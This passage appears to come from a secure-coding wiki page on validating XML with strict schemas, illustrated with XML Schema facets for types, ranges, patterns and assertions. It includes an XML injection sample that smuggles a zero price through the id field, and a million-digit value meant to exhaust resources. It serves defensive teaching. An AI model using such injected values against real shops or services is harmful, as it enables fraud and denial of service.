Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to open one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1,000,000 digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;, as is the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after this definition. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size of the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server. Typically this type of element should be restricted to no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
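&lt;br /&gt;
A minimal sketch of how the same document could be constrained with XML Schema instead of a DTD. The limits chosen here (100 characters for &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt;, at most three digits and a maximum of 150 for &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;) are illustrative assumptions, not values required by any specification:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;!-- assumed upper bound on the length of a name --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:'''maxLength''' value=&amp;quot;100&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;!-- bounds the written form: one to three digits, no sign --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{1,3}&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;!-- bounds the numeric value --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:'''maxInclusive''' value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; facet limits the length of the written form, so a long run of leading zeros is rejected even though its numeric value would be within range.&lt;br /&gt;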
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to unexpected input. The result could be the disclosure of internal errors, or documents that reach the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the 16 hexadecimal characters. As an example of this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema.&lt;br /&gt;
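&lt;br /&gt;
For the hexadecimal case mentioned at the start of this section, a minimal sketch using the built-in &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt; type could look as follows. The element name &amp;lt;tt&amp;gt;digest&amp;lt;/tt&amp;gt; and the fixed length of 16 octets are hypothetical choices for illustration:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;digest&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:hexBinary'''&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;!-- length is measured in octets, that is, 32 hexadecimal digits --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:length value=&amp;quot;16&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
As the DataPower case shows, such a declaration only protects the application if the processor actually validates the whole value against it.&lt;br /&gt;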
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. To avoid that logical vulnerability, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. XML Schema provides data types that exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If a less restrictive data type is used instead, a denominator of zero may reach the application and trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly chosen for elements that should only hold real numbers, such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With this schema, the price cannot trigger errors in the application by being set to Infinity or NaN, because the validator rejects those values as invalid. If those values were allowed, an attacker could exploit them.&lt;br /&gt;
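&lt;br /&gt;
As an illustrative sketch (the element values here are hypothetical and not part of the original example), a validator applying the schema above would be expected to reject the following instance, because &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; is not in the lexical space of &amp;lt;tt&amp;gt;xs:decimal&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;'''NaN'''&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Had &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; been declared as &amp;lt;tt&amp;gt;xs:double&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;xs:float&amp;lt;/tt&amp;gt;, the same instance would validate and the application would have to handle the special value itself.&lt;br /&gt;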
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain values should be restricted to specific sets: traffic lights have only three colors, there are only 12 months, and so on. The schema may have these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called an &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Because the value of the &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; element is limited to one of the values listed above, the application never has to handle arbitrary strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever an element or an attribute is used where size matters (for example, to avoid overflows or underflows), the schema should check that the length of the data is valid. The following schema constrains a name to a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When the possible values must have one specific length (for example, 8), the length can be specified as follows:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
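&lt;br /&gt;
Length facets apply to strings; for numeric types, a comparable constraint can be sketched with the &amp;lt;tt&amp;gt;minInclusive&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxInclusive&amp;lt;/tt&amp;gt; facets. The element name and the bounds of 1 and 1000 below are assumptions chosen for illustration, not values taken from a real application:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;quantity&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minInclusive''' value=&amp;quot;1&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxInclusive''' value=&amp;quot;1000&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;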
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. To ensure that the data complies with it, you can add a &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restriction to the XML schema. Social security numbers (SSN) serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes in XML schemas. An element or attribute is valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; references the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above discussed the potential consequences of using data types that include zero for denominators and proposed a data type containing only positive values. An alternative is to accept the entire range of integers except zero. To avoid disclosing potential errors, values can be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; that disallows the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that zero is never a valid &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt;, while still allowing negative numbers.&lt;br /&gt;
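&lt;br /&gt;
Note that &amp;lt;tt&amp;gt;xs:assertion&amp;lt;/tt&amp;gt; is an XML Schema 1.1 feature. As a hedged alternative sketch, assuming a validator that only supports XML Schema 1.0, a similar constraint (any integer except zero) could be expressed as a union of the built-in negative and positive integer types:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:'''union''' memberTypes=&amp;quot;xs:negativeInteger xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;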
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
When no maximum number of occurrences is defined, the application may have to cope with an extreme number of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, an optional element can use a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;0&amp;lt;/tt&amp;gt;, and an element with no upper limit can use a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
